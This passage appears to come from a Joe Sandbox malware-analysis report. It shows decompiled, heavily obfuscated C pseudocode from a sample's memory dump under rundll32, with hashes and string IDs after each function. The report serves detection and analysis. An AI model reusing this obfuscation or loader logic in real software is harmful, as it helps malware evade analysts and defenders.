                                                                                                                    				_v248 = _v248 ^ 0x00057d9a;
                                                                                                                    				_v252 = 0x68f561;
                                                                                                                    				_v252 = _v252 << 6;
                                                                                                                    				_v252 = _v252 >> 0xd;
                                                                                                                    				_v252 = _v252 | 0x3cddc102;
                                                                                                                    				_v252 = _v252 ^ 0x3cda88f2;
                                                                                                                    				_v192 = 0x7c8e99;
                                                                                                                    				_v192 = _v192 + 0x829c;
                                                                                                                    				_v192 = _v192 * 0x31;
                                                                                                                    				_v192 = _v192 ^ 0x17fda794;
                                                                                                                    				_v228 = 0x74d91a;
                                                                                                                    				_v228 = _v228 << 3;
                                                                                                                    				_v228 = _v228 + 0x7502;
                                                                                                                    				_v228 = _v228 * 0x63;
                                                                                                                    				_v228 = _v228 ^ 0x69a7ce60;
                                                                                                                    				_v208 = 0xc909ae;
                                                                                                                    				_v208 = _v208 << 1;
                                                                                                                    				_t463 = 0xb;
                                                                                                                    				_v208 = _v208 / _t463;
                                                                                                                    				_v208 = _v208 ^ 0x00276772;
                                                                                                                    				_v164 = 0x673800;
                                                                                                                    				_v164 = _v164 << 9;
                                                                                                                    				_v164 = _v164 ^ 0xce7e8a93;
                                                                                                                    				_v232 = 0xb859bd;
                                                                                                                    				_v232 = _v232 + 0xde76;
                                                                                                                    				_t464 = 0x5b;
                                                                                                                    				_v232 = _v232 * 0x1c;
                                                                                                                    				_v232 = _v232 * 0x30;
                                                                                                                    				_v232 = _v232 ^ 0xcc63b0a7;
                                                                                                                    				_v172 = 0x7eda56;
                                                                                                                    				_v172 = _v172 << 3;
                                                                                                                    				_v172 = _v172 ^ 0x03f50911;
                                                                                                                    				_v184 = 0x2f7891;
                                                                                                                    				_v184 = _v184 / _t464;
                                                                                                                    				_t465 = 0x41;
                                                                                                                    				_v184 = _v184 * 0x49;
                                                                                                                    				_v184 = _v184 ^ 0x0024fbf7;
                                                                                                                    				_v148 = 0x4a0bea;
                                                                                                                    				_v148 = _v148 ^ 0x502016f1;
                                                                                                                    				_v148 = _v148 ^ 0x506ad42a;
                                                                                                                    				_v260 = 0x9ebd58;
                                                                                                                    				_v260 = _v260 >> 8;
                                                                                                                    				_v260 = _v260 << 0xf;
                                                                                                                    				_v260 = _v260 + 0xb306;
                                                                                                                    				_v260 = _v260 ^ 0x4f54a3e8;
                                                                                                                    				_v204 = 0xce3506;
                                                                                                                    				_v204 = _v204 << 0xf;
                                                                                                                    				_v204 = _v204 << 0xc;
                                                                                                                    				_v204 = _v204 ^ 0x300ddb73;
                                                                                                                    				_v244 = 0xe7c592;
                                                                                                                    				_v244 = _v244 >> 5;
                                                                                                                    				_v244 = _v244 ^ 0x506a7775;
                                                                                                                    				_v244 = _v244 << 1;
                                                                                                                    				_v244 = _v244 ^ 0xa0d2afa7;
                                                                                                                    				_v268 = 0x1d8a79;
                                                                                                                    				_v268 = _v268 << 2;
                                                                                                                    				_v268 = _v268 / _t465;
                                                                                                                    				_v268 = _v268 | 0x253986a4;
                                                                                                                    				_v268 = _v268 ^ 0x2531568a;
                                                                                                                    				_v216 = 0x116531;
                                                                                                                    				_t466 = 0x61;
                                                                                                                    				_v216 = _v216 * 0x66;
                                                                                                                    				_v216 = _v216 ^ 0xfffdc9ed;
                                                                                                                    				_v216 = _v216 ^ 0xf917010b;
                                                                                                                    				_v200 = 0xc05f9c;
                                                                                                                    				_v200 = _v200 / _t466;
                                                                                                                    				_v200 = _v200 * 0x6f;
                                                                                                                    				_v200 = _v200 ^ 0x00dca3d1;
                                                                                                                    				_v212 = 0xdb89ea;
                                                                                                                    				_v212 = _v212 >> 0xa;
                                                                                                                    				_v212 = _v212 >> 9;
                                                                                                                    				_v212 = _v212 ^ 0x0000ad8d;
                                                                                                                    				_v152 = 0x38fb70;
                                                                                                                    				_v152 = _v152 ^ 0x310cc67b;
                                                                                                                    				_v152 = _v152 ^ 0x313af23a;
                                                                                                                    				_v136 = 0x7e2008;
                                                                                                                    				_v136 = _v136 ^ 0x7ad3030b;
                                                                                                                    				_v136 = _v136 ^ 0x7aaaa86e;
                                                                                                                    				_v196 = 0x9c4278;
                                                                                                                    				_t467 = 0x4e;
                                                                                                                    				_v196 = _v196 * 0x7e;
                                                                                                                    				_v196 = _v196 ^ 0xa26962db;
                                                                                                                    				_v196 = _v196 ^ 0xee89d9da;
                                                                                                                    				_v220 = 0x1e88f4;
                                                                                                                    				_v220 = _v220 >> 4;
                                                                                                                    				_v220 = _v220 >> 7;
                                                                                                                    				_v220 = _v220 ^ 0x000c14cc;
                                                                                                                    				_v140 = 0xc2e6ba;
                                                                                                                    				_v140 = _v140 + 0x8875;
                                                                                                                    				_v140 = _v140 ^ 0x00c43ba1;
                                                                                                                    				_v188 = 0xdb74c;
                                                                                                                    				_v188 = _v188 << 4;
                                                                                                                    				_v188 = _v188 * 0x5c;
                                                                                                                    				_v188 = _v188 ^ 0x4edda20a;
                                                                                                                    				_v236 = 0x62ea5;
                                                                                                                    				_v236 = _v236 / _t467;
                                                                                                                    				_v236 = _v236 >> 0xb;
                                                                                                                    				_v236 = _v236 ^ 0x7372adb3;
                                                                                                                    				_v236 = _v236 ^ 0x73757ff2;
                                                                                                                    				_v144 = 0x2b6271;
                                                                                                                    				_v144 = _v144 ^ 0x1ac7dce1;
                                                                                                                    				_v144 = _v144 ^ 0x1ae73668;
                                                                                                                    				_v224 = 0x8bb898;
                                                                                                                    				_v224 = _v224 + 0x43a9;
                                                                                                                    				_v224 = _v224 << 0x10;
                                                                                                                    				_t468 = 0x71;
                                                                                                                    				_t469 = _v132;
                                                                                                                    				_v224 = _v224 / _t468;
                                                                                                                    				_v224 = _v224 ^ 0x023712cd;
                                                                                                                    				_v156 = 0xb23c07;
                                                                                                                    				_v156 = _v156 + 0x4ded;
                                                                                                                    				_v156 = _v156 ^ 0x00b7ca1c;
                                                                                                                    				_v168 = 0xb501ce;
                                                                                                                    				_v168 = _v168 ^ 0x6706c67f;
                                                                                                                    				_v168 = _v168 ^ 0x67b3c7a1;
                                                                                                                    				_v176 = 0xab8984;
                                                                                                                    				_v176 = _v176 * 0x22;
                                                                                                                    				_v176 = _v176 ^ 0x16c84308;
                                                                                                                    				goto L1;
                                                                                                                    				do {
                                                                                                                    					while(1) {
                                                                                                                    						L1:
                                                                                                                    						_t474 = _t408 - 0xd9acfaa;
                                                                                                                    						if(_t474 > 0) {
                                                                                                                    							break;
                                                                                                                    						}
                                                                                                                    						if(_t474 == 0) {
                                                                                                                    							E00348519(_v236, _v144, _v128);
                                                                                                                    							_t408 = 0xfbb751f;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						if(_t408 == 0x15a913b) {
                                                                                                                    							_v40 = _t456;
                                                                                                                    							_v92 =  &_v32;
                                                                                                                    							_v56 =  *_t455;
                                                                                                                    							_v52 =  *((intOrPtr*)(_t455 + 4));
                                                                                                                    							_v88 = 0x20;
                                                                                                                    							_t393 = E00337735(_v192,  &_v112,  &_v120, _v228, _v208);
                                                                                                                    							_t471 = _t471 + 0x10;
                                                                                                                    							if(_t393 == 0) {
                                                                                                                    								L20:
                                                                                                                    								return _v132;
                                                                                                                    							}
                                                                                                                    							_t408 = 0xf0a856e;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						if(_t408 == 0x3749e66) {
                                                                                                                    							_t469 = E00340AE0(_v176, _v168);
                                                                                                                    							_t408 = 0x46acfc9;
                                                                                                                    							 *((intOrPtr*)(_t406 + 4)) = _v160 + _v124 + _t469;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						if(_t408 == 0x46acfc9) {
                                                                                                                    							_push(_t408);
                                                                                                                    							_push(_t408);
                                                                                                                    							_t403 = E00337FF2( *((intOrPtr*)(_t406 + 4)));
                                                                                                                    							 *_t406 = _t403;
                                                                                                                    							if(_t403 == 0) {
                                                                                                                    								_t408 = 0xd9acfaa;
                                                                                                                    							} else {
                                                                                                                    								_v132 = 1;
                                                                                                                    								_t408 = 0xfb3baa2;
                                                                                                                    							}
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						if(_t408 != 0x8e80a37) {
                                                                                                                    							goto L31;
                                                                                                                    						}
                                                                                                                    						_t408 = 0xfac38db;
                                                                                                                    					}
                                                                                                                    					if(_t408 == 0xf0a856e) {
                                                                                                                    						_t377 = E003370B3(_v164,  &_v128,  &_v120, _v232, _v172);
                                                                                                                    						_t471 = _t471 + 0xc;
                                                                                                                    						if(_t377 == 0) {
                                                                                                                    							_t408 = 0xfbb751f;
                                                                                                                    							goto L31;
                                                                                                                    						}
                                                                                                                    						_t408 = 0x3749e66;
                                                                                                                    						goto L1;
                                                                                                                    					}
                                                                                                                    					if(_t408 == 0xfac38db) {
                                                                                                                    						_push( *_t455);
                                                                                                                    						_t378 = E0034AE6D(_v240,  &_v32,  *((intOrPtr*)(_t455 + 4)), _v180, _t408, _v248);
                                                                                                                    						_t471 = _t471 + 0x14;
                                                                                                                    						if(_t378 == 0) {
                                                                                                                    							goto L20;
                                                                                                                    						}
                                                                                                                    						_t408 = 0x15a913b;
                                                                                                                    						goto L1;
                                                                                                                    					}
                                                                                                                    					if(_t408 == 0xfb3baa2) {
                                                                                                                    						_t457 =  *_t406;
                                                                                                                    						E00337E87(_v268, _v216, _v200, _t457);
                                                                                                                    						_t458 = _t457 + _v264;
                                                                                                                    						E0033ED7E(_v212, _t458, _v152, _v128, _v124);
                                                                                                                    						_t459 = _t458 + _v124;
                                                                                                                    						E0033A492(_v196, _v220, _t459, _t469);
                                                                                                                    						_t450 =  &(_t459[_t469]);
                                                                                                                    						_t471 = _t471 + 0x20;
                                                                                                                    						_t414 = _t459;
                                                                                                                    						if(_t459 >= _t450) {
                                                                                                                    							L25:
                                                                                                                    							_t386 = E00340AE0(0xe, 0);
                                                                                                                    							_t408 = 0xd9acfaa;
                                                                                                                    							 *((char*)(_t386 + _t459)) = 0;
                                                                                                                    							_t456 = _a4;
                                                                                                                    							goto L1;
                                                                                                                    						} else {
                                                                                                                    							goto L22;
                                                                                                                    						}
                                                                                                                    						do {
                                                                                                                    							L22:
                                                                                                                    							if(( *_t414 & 0x000000ff) == _v256) {
                                                                                                                    								 *_t414 = 0xc3;
                                                                                                                    							}
                                                                                                                    							_t414 =  &(_t414[1]);
                                                                                                                    						} while (_t414 < _t450);
                                                                                                                    						goto L25;
                                                                                                                    					}
                                                                                                                    					if(_t408 != 0xfbb751f) {
                                                                                                                    						goto L31;
                                                                                                                    					}
                                                                                                                    					E00348519(_v224, _v156, _v120);
                                                                                                                    					goto L20;
                                                                                                                    					L31:
                                                                                                                    				} while (_t408 != 0x5927677);
                                                                                                                    				goto L20;
                                                                                                                    			}

                                                                                                                    0x0033d6c2
                                                                                                                    0x00000000
                                                                                                                    0x0033d6c2
                                                                                                                    0x0033d6b8
                                                                                                                    0x00000000
                                                                                                                    0x0033d6b8
                                                                                                                    0x0033d575
                                                                                                                    0x0033d65b
                                                                                                                    0x0033d674
                                                                                                                    0x0033d679
                                                                                                                    0x0033d67e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033d684
                                                                                                                    0x00000000
                                                                                                                    0x0033d684
                                                                                                                    0x0033d581
                                                                                                                    0x0033d5b9
                                                                                                                    0x0033d5c8
                                                                                                                    0x0033d5d1
                                                                                                                    0x0033d5ee
                                                                                                                    0x0033d5f3
                                                                                                                    0x0033d60e
                                                                                                                    0x0033d613
                                                                                                                    0x0033d616
                                                                                                                    0x0033d619
                                                                                                                    0x0033d61d
                                                                                                                    0x0033d630
                                                                                                                    0x0033d63f
                                                                                                                    0x0033d646
                                                                                                                    0x0033d64b
                                                                                                                    0x0033d64f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033d61f
                                                                                                                    0x0033d61f
                                                                                                                    0x0033d626
                                                                                                                    0x0033d628
                                                                                                                    0x0033d628
                                                                                                                    0x0033d62b
                                                                                                                    0x0033d62c
                                                                                                                    0x00000000
                                                                                                                    0x0033d61f
                                                                                                                    0x0033d589
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033d5a1
                                                                                                                    0x00000000
                                                                                                                    0x0033d6c7
                                                                                                                    0x0033d6c7
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $qb+$rg'$uwjP$za%$M
                                                                                                                    • API String ID: 0-3591755710
                                                                                                                    • Opcode ID: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                    • Instruction ID: 3c496515fcd3273a7b524f26ca1969706e7e561950934ce514409f27306c6198
                                                                                                                    • Opcode Fuzzy Hash: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                    • Instruction Fuzzy Hash: D01210715083809FD769CF25C48AA5BFBF1FBC4348F50891DF69A8A261DBB19948CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E0034907F(intOrPtr* __ecx) {
                                                                                                                    				intOrPtr* _v4;
                                                                                                                    				char _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				unsigned int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				signed int _v108;
                                                                                                                    				signed int _v112;
                                                                                                                    				signed int _v116;
                                                                                                                    				signed int _v120;
                                                                                                                    				signed int _v124;
                                                                                                                    				signed int _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				void* _t284;
                                                                                                                    				void* _t285;
                                                                                                                    				intOrPtr _t286;
                                                                                                                    				void* _t293;
                                                                                                                    				void* _t301;
                                                                                                                    				signed int _t304;
                                                                                                                    				signed int _t305;
                                                                                                                    				signed int _t306;
                                                                                                                    				signed int _t307;
                                                                                                                    				signed int _t308;
                                                                                                                    				void* _t311;
                                                                                                                    				intOrPtr* _t343;
                                                                                                                    				void* _t347;
                                                                                                                    				signed int* _t348;
                                                                                                                    
                                                                                                                    				_t348 =  &_v132;
                                                                                                                    				_t343 = __ecx;
                                                                                                                    				_v4 = __ecx;
                                                                                                                    				_v40 = 0x7c806d;
                                                                                                                    				_v40 = _v40 + 0x9e80;
                                                                                                                    				_v40 = _v40 ^ 0x007d1eed;
                                                                                                                    				_v12 = 0xea5ac0;
                                                                                                                    				_v12 = _v12 + 0xffff451e;
                                                                                                                    				_v12 = _v12 ^ 0x00e99fde;
                                                                                                                    				_v24 = 0xace3a9;
                                                                                                                    				_t347 = 0;
                                                                                                                    				_t304 = 0xa;
                                                                                                                    				_v24 = _v24 / _t304;
                                                                                                                    				_v24 = _v24 ^ 0x001149f7;
                                                                                                                    				_t301 = 0x97dfe60;
                                                                                                                    				_v112 = 0x63471f;
                                                                                                                    				_v112 = _v112 ^ 0x706c6b64;
                                                                                                                    				_v112 = _v112 | 0x0d4cecae;
                                                                                                                    				_v112 = _v112 << 3;
                                                                                                                    				_v112 = _v112 ^ 0xea7f67f8;
                                                                                                                    				_v28 = 0x68a2fc;
                                                                                                                    				_t305 = 0x5b;
                                                                                                                    				_v28 = _v28 * 0x1c;
                                                                                                                    				_v28 = _v28 ^ 0x0b71d390;
                                                                                                                    				_v84 = 0x508d02;
                                                                                                                    				_v84 = _v84 | 0x7bfb7ba7;
                                                                                                                    				_v84 = _v84 ^ 0x7bffa5e3;
                                                                                                                    				_v124 = 0xc0d8a4;
                                                                                                                    				_v124 = _v124 + 0xffffd7c7;
                                                                                                                    				_v124 = _v124 ^ 0xdba96bec;
                                                                                                                    				_v124 = _v124 + 0xffffcd63;
                                                                                                                    				_v124 = _v124 ^ 0xdb66cc39;
                                                                                                                    				_v116 = 0xc7a01f;
                                                                                                                    				_v116 = _v116 * 0x50;
                                                                                                                    				_v116 = _v116 << 7;
                                                                                                                    				_v116 = _v116 + 0x525d;
                                                                                                                    				_v116 = _v116 ^ 0x3100192e;
                                                                                                                    				_v88 = 0x173e76;
                                                                                                                    				_v88 = _v88 / _t305;
                                                                                                                    				_v88 = _v88 + 0xcdb8;
                                                                                                                    				_v88 = _v88 ^ 0x00098d3b;
                                                                                                                    				_v48 = 0x3a45de;
                                                                                                                    				_t306 = 0x3d;
                                                                                                                    				_v48 = _v48 / _t306;
                                                                                                                    				_v48 = _v48 ^ 0x0006d702;
                                                                                                                    				_v52 = 0xd8d0f7;
                                                                                                                    				_v52 = _v52 | 0xabcf1793;
                                                                                                                    				_v52 = _v52 + 0xffff6a1e;
                                                                                                                    				_v52 = _v52 ^ 0xabd8e28c;
                                                                                                                    				_v64 = 0xff5420;
                                                                                                                    				_v64 = _v64 >> 9;
                                                                                                                    				_v64 = _v64 + 0xffff2626;
                                                                                                                    				_v64 = _v64 ^ 0xfff0768b;
                                                                                                                    				_v80 = 0x65116e;
                                                                                                                    				_v80 = _v80 >> 9;
                                                                                                                    				_v80 = _v80 | 0xde6750c8;
                                                                                                                    				_v80 = _v80 ^ 0xde6208e1;
                                                                                                                    				_v56 = 0x2d6903;
                                                                                                                    				_v56 = _v56 >> 0xc;
                                                                                                                    				_v56 = _v56 + 0xffff4c70;
                                                                                                                    				_v56 = _v56 ^ 0xfff58c10;
                                                                                                                    				_v132 = 0xe5be5a;
                                                                                                                    				_v132 = _v132 + 0xfffffbec;
                                                                                                                    				_v132 = _v132 << 3;
                                                                                                                    				_v132 = _v132 ^ 0x46ad3c03;
                                                                                                                    				_v132 = _v132 ^ 0x418237eb;
                                                                                                                    				_v108 = 0x3fa801;
                                                                                                                    				_v108 = _v108 + 0x902;
                                                                                                                    				_v108 = _v108 >> 7;
                                                                                                                    				_v108 = _v108 ^ 0x9ac0b97a;
                                                                                                                    				_v108 = _v108 ^ 0x9ac73a04;
                                                                                                                    				_v72 = 0x454e35;
                                                                                                                    				_v72 = _v72 + 0x4c9c;
                                                                                                                    				_t307 = 0x29;
                                                                                                                    				_v72 = _v72 / _t307;
                                                                                                                    				_v72 = _v72 ^ 0x000328df;
                                                                                                                    				_v32 = 0x46b9f;
                                                                                                                    				_v32 = _v32 >> 4;
                                                                                                                    				_v32 = _v32 ^ 0x0003d4b9;
                                                                                                                    				_v16 = 0xab007f;
                                                                                                                    				_v16 = _v16 ^ 0x56a4e801;
                                                                                                                    				_v16 = _v16 ^ 0x56002f48;
                                                                                                                    				_v100 = 0xb9d48c;
                                                                                                                    				_v100 = _v100 | 0xb434f54e;
                                                                                                                    				_v100 = _v100 >> 0x10;
                                                                                                                    				_v100 = _v100 ^ 0x000dcd0e;
                                                                                                                    				_v92 = 0x17070b;
                                                                                                                    				_t308 = 0x37;
                                                                                                                    				_v92 = _v92 / _t308;
                                                                                                                    				_v92 = _v92 << 7;
                                                                                                                    				_v92 = _v92 ^ 0x0038b56c;
                                                                                                                    				_v60 = 0xdb418a;
                                                                                                                    				_v60 = _v60 * 0x4d;
                                                                                                                    				_v60 = _v60 << 2;
                                                                                                                    				_v60 = _v60 ^ 0x07c52fa3;
                                                                                                                    				_v68 = 0x99d1b0;
                                                                                                                    				_v68 = _v68 << 1;
                                                                                                                    				_v68 = _v68 + 0xadc1;
                                                                                                                    				_v68 = _v68 ^ 0x01384a96;
                                                                                                                    				_v120 = 0xfb4a64;
                                                                                                                    				_v120 = _v120 | 0x92bfeeef;
                                                                                                                    				_v120 = _v120 + 0x1827;
                                                                                                                    				_v120 = _v120 >> 5;
                                                                                                                    				_v120 = _v120 ^ 0x0494323d;
                                                                                                                    				_v128 = 0xf75f57;
                                                                                                                    				_v128 = _v128 >> 4;
                                                                                                                    				_v128 = _v128 + 0xe158;
                                                                                                                    				_v128 = _v128 + 0xffff16ce;
                                                                                                                    				_v128 = _v128 ^ 0x000f9950;
                                                                                                                    				_v76 = 0xb94cf;
                                                                                                                    				_v76 = _v76 | 0xc911a6ab;
                                                                                                                    				_v76 = _v76 >> 2;
                                                                                                                    				_v76 = _v76 ^ 0x3240c46f;
                                                                                                                    				_v104 = 0x7ca07;
                                                                                                                    				_v104 = _v104 * 0x23;
                                                                                                                    				_v104 = _v104 >> 4;
                                                                                                                    				_v104 = _v104 ^ 0xe4d42587;
                                                                                                                    				_v104 = _v104 ^ 0xe4c14657;
                                                                                                                    				_v44 = 0x308a5a;
                                                                                                                    				_v44 = _v44 >> 0x10;
                                                                                                                    				_v44 = _v44 ^ 0x0006e55e;
                                                                                                                    				_v96 = 0x427aa5;
                                                                                                                    				_v96 = _v96 + 0xed3d;
                                                                                                                    				_v96 = _v96 + 0xffff13f4;
                                                                                                                    				_v96 = _v96 ^ 0x0046a078;
                                                                                                                    				_v20 = 0xf8f4;
                                                                                                                    				_v20 = _v20 * 0x4a;
                                                                                                                    				_t284 = 0x4469cd4;
                                                                                                                    				_v20 = _v20 ^ 0x004ab19f;
                                                                                                                    				_v36 = 0x7998ac;
                                                                                                                    				_v36 = _v36 >> 0xc;
                                                                                                                    				_v36 = _v36 ^ 0x0008cf6c;
                                                                                                                    				do {
                                                                                                                    					while(_t301 != _t284) {
                                                                                                                    						if(_t301 == 0x661bd7c) {
                                                                                                                    							E0033957D(_v8, _v96, _v20, _v28, _v36);
                                                                                                                    						} else {
                                                                                                                    							if(_t301 == 0x8cd68b1) {
                                                                                                                    								_push(_v116);
                                                                                                                    								_push(_v124);
                                                                                                                    								_t293 = E0034DCF7(_v84, 0x331954, __eflags);
                                                                                                                    								_push(_v52);
                                                                                                                    								_push(_v48);
                                                                                                                    								__eflags = E00339462(_t293, _v80,  &_v8, E0034DCF7(_v88, 0x331814, __eflags), _v56, _v40) - _v12;
                                                                                                                    								_t301 =  ==  ? 0x4469cd4 : 0x94c729c;
                                                                                                                    								E0033A8B0(_v132, _t293, _v108);
                                                                                                                    								E0033A8B0(_v72, _t294, _v32);
                                                                                                                    								_t343 = _v4;
                                                                                                                    								L8:
                                                                                                                    								_t284 = 0x4469cd4;
                                                                                                                    								_t348 =  &(_t348[0xb]);
                                                                                                                    								goto L9;
                                                                                                                    							} else {
                                                                                                                    								if(_t301 != 0x97dfe60) {
                                                                                                                    									goto L9;
                                                                                                                    								} else {
                                                                                                                    									_t301 = 0x8cd68b1;
                                                                                                                    									continue;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L12:
                                                                                                                    						return _t347;
                                                                                                                    					}
                                                                                                                    					_push(_v92);
                                                                                                                    					_push(_v100);
                                                                                                                    					_t285 = E0034DCF7(_v16, 0x331854, __eflags);
                                                                                                                    					_pop(_t311);
                                                                                                                    					_t286 =  *0x353dfc; // 0x0
                                                                                                                    					__eflags = E0033AA4D(_v60, _t285,  *((intOrPtr*)(_t343 + 4)), _v120, _v24, _v8, _t286 + 0x40, _v128, _t311,  *_t343, _v76) - _v112;
                                                                                                                    					_t301 = 0x661bd7c;
                                                                                                                    					_t347 =  ==  ? 1 : _t347;
                                                                                                                    					E0033A8B0(_v104, _t285, _v44);
                                                                                                                    					goto L8;
                                                                                                                    					L9:
                                                                                                                    					__eflags = _t301 - 0x94c729c;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				goto L12;
                                                                                                                    			}


















































                                                                                                                    0x00000000
                                                                                                                    0x003495bd
                                                                                                                    0x003495bd
                                                                                                                    0x003495bd
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5NE$=$H/$X$]R$dklp
                                                                                                                    • API String ID: 0-668800459
                                                                                                                    • Opcode ID: 37b07f1614df070e92d938dc5a543b96f66459f49eca731d5b22bb1b86773717
                                                                                                                    • Instruction ID: ddde8de6715dfc2cc1b9efb5558bab8e5df9c23eb794cf4281b4f7f1471c5a71
                                                                                                                    • Opcode Fuzzy Hash: 37b07f1614df070e92d938dc5a543b96f66459f49eca731d5b22bb1b86773717
                                                                                                                    • Instruction Fuzzy Hash: 3FD11FB11087808FD769CF25C48A60BBBF1FBC5758F50891DF1AA8A260DBB59949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00350F33() {
                                                                                                                    				signed int _t237;
                                                                                                                    				signed char _t246;
                                                                                                                    				signed short _t255;
                                                                                                                    				signed int _t262;
                                                                                                                    				signed char _t269;
                                                                                                                    				intOrPtr* _t292;
                                                                                                                    				signed short _t301;
                                                                                                                    				void* _t302;
                                                                                                                    				signed short _t306;
                                                                                                                    				signed int _t309;
                                                                                                                    				signed int _t310;
                                                                                                                    				signed int _t311;
                                                                                                                    				signed int _t312;
                                                                                                                    				signed int _t313;
                                                                                                                    				signed int _t314;
                                                                                                                    				signed int _t315;
                                                                                                                    				signed short _t319;
                                                                                                                    				void* _t321;
                                                                                                                    
                                                                                                                    				 *(_t321 + 0x20) = 0xee0abc;
                                                                                                                    				 *(_t321 + 0x20) =  *(_t321 + 0x20) | 0x247001dc;
                                                                                                                    				_t262 = 0x40ff1a8;
                                                                                                                    				 *(_t321 + 0x30) =  *(_t321 + 0x20) * 0xb;
                                                                                                                    				 *(_t321 + 0x30) =  *(_t321 + 0x30) ^ 0x96ee7e42;
                                                                                                                    				 *(_t321 + 0x14) = 0x97563a;
                                                                                                                    				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0xa3ba;
                                                                                                                    				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0x7434;
                                                                                                                    				_t309 = 0x68;
                                                                                                                    				 *(_t321 + 0x18) =  *(_t321 + 0x14) / _t309;
                                                                                                                    				 *(_t321 + 0x18) =  *(_t321 + 0x18) ^ 0x000fa3ad;
                                                                                                                    				 *(_t321 + 0x54) = 0x46dfd;
                                                                                                                    				_t310 = 0x22;
                                                                                                                    				 *(_t321 + 0x54) =  *(_t321 + 0x54) * 0x3f;
                                                                                                                    				 *(_t321 + 0x54) =  *(_t321 + 0x54) ^ 0x011c0bd3;
                                                                                                                    				 *(_t321 + 0x50) = 0x65d669;
                                                                                                                    				 *(_t321 + 0x50) =  *(_t321 + 0x50) >> 4;
                                                                                                                    				 *(_t321 + 0x50) =  *(_t321 + 0x50) ^ 0x0002663c;
                                                                                                                    				 *(_t321 + 0x1c) = 0xa5dab8;
                                                                                                                    				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) * 0x23;
                                                                                                                    				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 2;
                                                                                                                    				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) << 0xd;
                                                                                                                    				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x67379b84;
                                                                                                                    				 *(_t321 + 0x58) = 0x508bac;
                                                                                                                    				 *(_t321 + 0x58) =  *(_t321 + 0x58) + 0x81b9;
                                                                                                                    				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x005059a5;
                                                                                                                    				 *(_t321 + 0x38) = 0x6dc462;
                                                                                                                    				 *(_t321 + 0x38) =  *(_t321 + 0x38) / _t310;
                                                                                                                    				 *(_t321 + 0x38) =  *(_t321 + 0x38) | 0x03137037;
                                                                                                                    				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x03112268;
                                                                                                                    				 *(_t321 + 0x20) = 0x10f337;
                                                                                                                    				 *(_t321 + 0x20) =  *(_t321 + 0x20) << 0x10;
                                                                                                                    				_t311 = 0x7a;
                                                                                                                    				 *(_t321 + 0x1c) =  *(_t321 + 0x20) * 0x5e;
                                                                                                                    				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 3;
                                                                                                                    				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x09c781ed;
                                                                                                                    				 *(_t321 + 0x28) = 0x5a8e56;
                                                                                                                    				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x165ac6ba;
                                                                                                                    				 *(_t321 + 0x28) =  *(_t321 + 0x28) / _t311;
                                                                                                                    				 *(_t321 + 0x28) =  *(_t321 + 0x28) >> 6;
